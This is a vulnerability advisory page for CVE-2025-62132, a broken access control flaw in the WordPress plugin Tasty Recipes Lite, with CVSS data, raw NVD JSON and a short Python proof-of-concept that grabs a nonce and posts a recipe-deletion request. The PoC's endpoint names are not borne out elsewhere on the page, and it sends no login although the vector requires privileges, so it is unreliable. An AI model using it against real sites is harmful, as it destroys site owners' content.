Security Vulnerability Report
中文
CVE-2025-62132 CVSS 4.3 MEDIUM

CVE-2025-62132

Published: 2025-12-31 16:15:46
Last Modified: 2026-04-23 15:34:36

Description

Missing Authorization vulnerability in Strategy11 Team Tasty Recipes Lite tasty-recipes-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tasty Recipes Lite: from n/a through <= 1.1.5.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

1.1.5及更低版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests target = 'http://target-wordpress-site.com' # 获取Nonce response = requests.get(f'{target}/wp-admin/admin-ajax.php?action=tasty_recipes_get_nonce') nonce = response.json()['data'] # 利用漏洞执行未授权操作 payload = { 'action': 'tasty_recipes_admin_action', 'nonce': nonce, 'subaction': 'delete_recipe', 'recipe_id': 1 } requests.post(f'{target}/wp-admin/admin-ajax.php', data=payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62132", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:45.750", "lastModified": "2026-04-23T15:34:36.030", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Strategy11 Team Tasty Recipes Lite tasty-recipes-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tasty Recipes Lite: from n/a through <= 1.1.5."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Strategy11 Team Tasty Recipes Lite permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Tasty Recipes Lite: desde n/a hasta 1.1.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/tasty-recipes-lite/vulnerability/wordpress-tasty-recipes-lite-plugin-1-1-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}